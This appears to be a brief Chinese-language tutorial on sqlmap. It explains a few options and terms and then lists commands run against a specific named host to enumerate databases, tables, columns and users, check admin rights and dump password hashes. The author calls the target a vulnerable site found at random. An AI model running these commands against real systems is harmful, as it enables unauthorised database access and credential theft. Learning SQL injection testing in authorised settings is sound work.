url地址必须是存在漏洞的ip地址,我这个url地址是随便找的漏洞网站,有的命令可能对这网站没有用
-u:指定想要使用的url
-r:指定文件,从文件中探测
单词解意:
db:数据库database的缩写 dbs为数据库的复数 dba中的a为adminstrator的缩写
current:当前的
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --dbs #查看所有的数据库
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --tables #爆出所有表
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --users #查看数据库所有用户
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --passwords #查看数据库用户名密码
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --current-user #查看当前用户
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --is-dba #查看当前用户是否有管理员权限
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --columns #查看所有列
sqlmap -u "http://rhiq8003.ia.aqlab.cn/?id=1" --current-db #查看当前数据库